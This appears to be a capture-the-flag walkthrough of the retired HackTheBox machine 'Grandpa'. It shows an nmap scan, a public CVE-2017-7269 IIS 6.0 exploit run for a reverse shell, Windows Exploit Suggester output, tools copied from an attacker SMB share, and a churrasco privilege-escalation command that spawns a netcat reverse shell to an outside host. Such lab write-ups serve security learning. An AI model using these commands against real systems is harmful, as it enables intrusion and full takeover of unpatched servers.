HTB Walkthrough : Grandpa

Today we are going to solve another HackTheBox machine name “Grandpa” created by ch4p . This is lab comes under the retired section of the HackTheBox . This is lab mainly focused on kernel exploitation .

Level : Easy

Attacking Strategy

  • Networking scanning
    • Nmap
  • Enumeration
  • Manual exploit
    • CVE-2017-7269
  • Privilege Escalation
    • Non-Metasploit window exploit suggester
    • Kernel exploit

Walkthrough

IP address : 10.129.90.186

We start our enumeration by firing the Nmap scan with script and version scan mode which provide the information about the open ports and running services on the target system .

nmap -sC -sV -p- 10.129.90.186

Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-14 22:50 IST
Nmap scan report for 10.129.90.186
Host is up (0.17s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods: 
|_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan: 
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
|   Server Type: Microsoft-IIS/6.0
|   WebDAV type: Unknown
|_  Server Date: Fri, 14 May 2021 17:24:29 GMT
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Enumeration

Now get some good information like port 80 is open on which IIS 6.0 is deployed its old version and after visiting the page its show some content which is useless but after doing simple search for any exploit on google , we come to an exploit which you can get from GitHub .

After reading the exploit , we understand the argument we have to pass . For this exploit we just simply have to pass the Remote Address with reverse listen address and if everything is good then we got the netcat based reverse shell .

https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269
cd iis6-exploit-2017-CVE-2017-7269
ls
nano exploit.py
python exploit.py 10.129.90.186 80 10.10.14.79 4545

Privilege Escalation

Now we got the initial foothold on target machine now its time to go with elevated account or in simple language administrative access. So first we start enumerating the machine by running the “systeminfo” command which gives the information about the window machine and it also show the Hotfix value is null which bring our mind towards the kernel exploit . So we pass the result of system information to window exploit suggester ,we got some result .

python wes.py ../systeminfo.txt --exploits-only -i "Elevation of Privilege"
Windows Exploit Suggester 0.98 ( https://github.com/bitsadmin/wesng/ )
[+] Parsing systeminfo output
[+] Operating System
    - Name: Microsoft Windows Server 2003
    - Generation: 2003
    - Build: 3790
    - Version: None
    - Architecture: 
    - Installed hotfixes: None
[+] Loading definitions
    - Creation date of definitions: 20210508
[+] Determining missing patches
[+] Filtering duplicate vulnerabilities
[+] Applying display filters
[+] Found vulnerabilities

Date: 20150714
CVE: CVE-2015-2365
KB: KB3070102
Title: Vulnerabilities in Windows Kernel-Mode Driver Could Allow Elevation of Privilege
Affected product: Microsoft Windows Server 2003 x64 Edition Service Pack 2
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploit: https://www.exploit-db.com/exploits/38267/

Date: 20150714
CVE: CVE-2015-2365
KB: KB3070102
Title: Vulnerabilities in Windows Kernel-Mode Driver Could Allow Elevation of Privilege
Affected product: Microsoft Windows Server 2003 for Itanium-based Systems Service Pack 2
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploit: https://www.exploit-db.com/exploits/38267/

Date: 20150714
CVE: CVE-2015-2366
KB: KB3070102
Title: Vulnerabilities in Windows Kernel-Mode Driver Could Allow Elevation of Privilege
Affected product: Microsoft Windows Server 2003 x64 Edition Service Pack 2
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploit: https://www.exploit-db.com/exploits/38266/

Date: 20150714
CVE: CVE-2015-2366
KB: KB3070102
Title: Vulnerabilities in Windows Kernel-Mode Driver Could Allow Elevation of Privilege
Affected product: Microsoft Windows Server 2003 for Itanium-based Systems Service Pack 2
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploit: https://www.exploit-db.com/exploits/38266/

Date: 20141014
CVE: CVE-2014-4971
KB: KB2993254
Title: Vulnerability in Message Queuing Service Could Allow Elevation of Privilege
Affected product: Microsoft Windows Server 2003 x64 Edition Service Pack 2
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploits: http://seclists.org/fulldisclosure/2014/Jul/97, https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt, https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt, http://seclists.org/fulldisclosure/2014/Jul/96, http://www.exploit-db.com/exploits/34112, http://packetstormsecurity.com/files/128674/Microsoft-Bluetooth-Personal-Area-Networking-BthPan.sys-Privilege-Escalation.html, http://www.exploit-db.com/exploits/34982, http://www.exploit-db.com/exploits/34131

Date: 20141014
CVE: CVE-2014-4971
KB: KB2993254
Title: Vulnerability in Message Queuing Service Could Allow Elevation of Privilege
Affected product: Microsoft Windows Server 2003 for Itanium-based Systems Service Pack 2
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploits: http://seclists.org/fulldisclosure/2014/Jul/97, https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt, https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt, http://seclists.org/fulldisclosure/2014/Jul/96, http://www.exploit-db.com/exploits/34112, http://packetstormsecurity.com/files/128674/Microsoft-Bluetooth-Personal-Area-Networking-BthPan.sys-Privilege-Escalation.html, http://www.exploit-db.com/exploits/34982, http://www.exploit-db.com/exploits/34131

Date: 20110208
CVE: CVE-2010-4398
KB: KB2393802
Title: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege
Affected product: Microsoft Windows Server 2003 x64 Edition Service Pack 2
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploits: http://www.exploit-db.com/bypassing-uac-with-user-privilege-under-windows-vista7-mirror/, http://www.exploit-db.com/exploits/15609/

Date: 20110208
CVE: CVE-2010-4398
KB: KB2393802
Title: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege
Affected product: Microsoft Windows Server 2003 for Itanium-based Systems Service Pack 2
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploits: http://www.exploit-db.com/bypassing-uac-with-user-privilege-under-windows-vista7-mirror/, http://www.exploit-db.com/exploits/15609/

Date: 20140114
CVE: CVE-2013-5065
KB: KB2914368
Title: Vulnerability in Windows Kernel Could Allow Elevation of Privilege
Affected product: Microsoft Windows Server 2003 x64 Edition Service Pack 2
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploit: https://www.exploit-db.com/exploits/37732/

Date: 20140114
CVE: CVE-2013-5065
KB: KB2914368
Title: Vulnerability in Windows Kernel Could Allow Elevation of Privilege
Affected product: Microsoft Windows Server 2003 for Itanium-based Systems Service Pack 2
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploit: https://www.exploit-db.com/exploits/37732/

Date: 20090414
CVE: CVE-2008-1436
KB: KB952004
Title: Vulnerabilities in Windows Could Allow Elevation of Privilege
Affected product: Microsoft Windows Server 2003 x64 Edition
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploit: https://www.exploit-db.com/exploits/6705

Date: 20090414
CVE: CVE-2008-1436
KB: KB952004
Title: Vulnerabilities in Windows Could Allow Elevation of Privilege
Affected product: Microsoft Windows Server 2003 x64 Edition Service Pack 2
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploit: https://www.exploit-db.com/exploits/6705

Date: 20090414
CVE: CVE-2008-1436
KB: KB952004
Title: Vulnerabilities in Windows Could Allow Elevation of Privilege
Affected product: Microsoft Windows Server 2003 for Itanium-based Systems Service Pack 1
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploit: https://www.exploit-db.com/exploits/6705

Date: 20090414
CVE: CVE-2008-1436
KB: KB952004
Title: Vulnerabilities in Windows Could Allow Elevation of Privilege
Affected product: Microsoft Windows Server 2003 for Itanium-based Systems Service Pack 2
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploit: https://www.exploit-db.com/exploits/6705

Date: 20090414
CVE: CVE-2008-1436
KB: KB956572
Title: Vulnerabilities in Windows Could Allow Elevation of Privilege
Affected product: Microsoft Windows Server 2003 x64 Edition
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploit: https://www.exploit-db.com/exploits/6705

Date: 20090414
CVE: CVE-2008-1436
KB: KB956572
Title: Vulnerabilities in Windows Could Allow Elevation of Privilege
Affected product: Microsoft Windows Server 2003 x64 Edition Service Pack 2
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploit: https://www.exploit-db.com/exploits/6705

Date: 20090414
CVE: CVE-2008-1436
KB: KB956572
Title: Vulnerabilities in Windows Could Allow Elevation of Privilege
Affected product: Microsoft Windows Server 2003 for Itanium-based Systems Service Pack 1
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploit: https://www.exploit-db.com/exploits/6705

Date: 20090414
CVE: CVE-2008-1436
KB: KB956572
Title: Vulnerabilities in Windows Could Allow Elevation of Privilege
Affected product: Microsoft Windows Server 2003 for Itanium-based Systems Service Pack 2
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploit: https://www.exploit-db.com/exploits/6705

Date: 20140708
CVE: CVE-2014-1767
KB: KB2961072
Title: Vulnerability in Ancillary Function Driver (AFD) Could Allow Elevation of Privilege
Affected product: Microsoft Windows Server 2003 x64 Edition Service Pack 2
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploits: https://www.exploit-db.com/exploits/39525/, https://www.exploit-db.com/exploits/39446/

Date: 20140708
CVE: CVE-2014-1767
KB: KB2961072
Title: Vulnerability in Ancillary Function Driver (AFD) Could Allow Elevation of Privilege
Affected product: Microsoft Windows Server 2003 for Itanium-based Systems Service Pack 2
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploits: https://www.exploit-db.com/exploits/39525/, https://www.exploit-db.com/exploits/39446/

Date: 20110809
CVE: CVE-2011-1974
KB: KB2566454
Title: Vulnerability in Remote Access Service NDISTAPI Driver Could Allow Elevation of Privilege
Affected product: Microsoft Windows Server 2003 x64 Edition Service Pack 2
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploit: https://www.exploit-db.com/exploits/40627/

Date: 20110809
CVE: CVE-2011-1974
KB: KB2566454
Title: Vulnerability in Remote Access Service NDISTAPI Driver Could Allow Elevation of Privilege
Affected product: Microsoft Windows Server 2003 for Itanium-based Systems Service Pack 2
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploit: https://www.exploit-db.com/exploits/40627/

Date: 20141111
CVE: CVE-2014-4076
KB: KB2989935
Title: Vulnerability in TCP/IP Could Allow Elevation of Privilege
Affected product: Microsoft Windows Server 2003 for Itanium-based Systems Service Pack 2
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploits: http://www.exploit-db.com/exploits/35936, https://www.exploit-db.com/exploits/37755/

Date: 20141111
CVE: CVE-2014-4076
KB: KB2989935
Title: Vulnerability in TCP/IP Could Allow Elevation of Privilege
Affected product: Microsoft Windows Server 2003 x64 Edition Service Pack 2
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploits: http://www.exploit-db.com/exploits/35936, https://www.exploit-db.com/exploits/37755/

Date: 20150512
CVE: CVE-2015-1701
KB: KB3045171
Title: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege
Affected product: Microsoft Windows Server 2003 x64 Edition Service Pack 2
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploits: https://www.exploit-db.com/exploits/37049/, https://www.exploit-db.com/exploits/37367/

Date: 20150512
CVE: CVE-2015-1701
KB: KB3045171
Title: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege
Affected product: Microsoft Windows Server 2003 for Itanium-based Systems Service Pack 2
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploits: https://www.exploit-db.com/exploits/37049/, https://www.exploit-db.com/exploits/37367/

Date: 20150113
CVE: CVE-2015-0004
KB: KB3021674
Title: Vulnerability in Windows User Profile Service Could Allow Elevation of Privilege
Affected product: Microsoft Windows Server 2003 x64 Edition Service Pack 2
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploit: https://code.google.com/p/google-security-research/issues/detail?id=123

Date: 20150113
CVE: CVE-2015-0004
KB: KB3021674
Title: Vulnerability in Windows User Profile Service Could Allow Elevation of Privilege
Affected product: Microsoft Windows Server 2003 for Itanium-based Systems Service Pack 2
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploit: https://code.google.com/p/google-security-research/issues/detail?id=123

Date: 20150714
CVE: CVE-2015-2370
KB: KB3067505
Title: Vulnerability in Windows Remote Procedure Call Could Allow Elevation of Privilege
Affected product: Microsoft Windows Server 2003 x64 Edition Service Pack 2
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploit: https://www.exploit-db.com/exploits/37768/

Date: 20150714
CVE: CVE-2015-2370
KB: KB3067505
Title: Vulnerability in Windows Remote Procedure Call Could Allow Elevation of Privilege
Affected product: Microsoft Windows Server 2003 for Itanium-based Systems Service Pack 2
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploit: https://www.exploit-db.com/exploits/37768/

[+] Missing patches: 12
    - KB952004: patches 4 vulnerabilities
    - KB3070102: patches 4 vulnerabilities
    - KB956572: patches 4 vulnerabilities
    - KB2961072: patches 2 vulnerabilities
    - KB3045171: patches 2 vulnerabilities
    - KB2989935: patches 2 vulnerabilities
    - KB2393802: patches 2 vulnerabilities
    - KB2993254: patches 2 vulnerabilities
    - KB2566454: patches 2 vulnerabilities
    - KB3067505: patches 2 vulnerabilities
    - KB2914368: patches 2 vulnerabilities
    - KB3021674: patches 2 vulnerabilities
[+] KB with the most recent release date
    - ID: KB3070102
    - Release date: 20150714

[+] Done. Displaying 30 of the 1520 vulnerabilities found.

Here window exploit suggester show various exploit , after trying some exploit we come to an exploit which you can get from the pentestskyoffical GitHub page . We transfer the binary to target system and make a reverse shell over netcat .

and we transfer all binary over temporary SMB server hosted by impacket to whitelist place i.e Temp directory

copy \\10.10.14.79\share\nc.exe .
copy \\10.10.14.79\share\churrasco.exe .

Once everything is set its time to fire the kernel exploit . you can also learn more about this exploit from here and here .

.\churrasco.exe -d "nc.exe -e cmd.exe 10.10.14.79 1234"

Great we got our administrative shell and we grab all the user and administrative flags .

type "C:\Documents and Settings\Administrator\Desktop\root.txt"
type "C:\Documents and Settings\Harry\Desktop\user.txt"

Leave a Comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.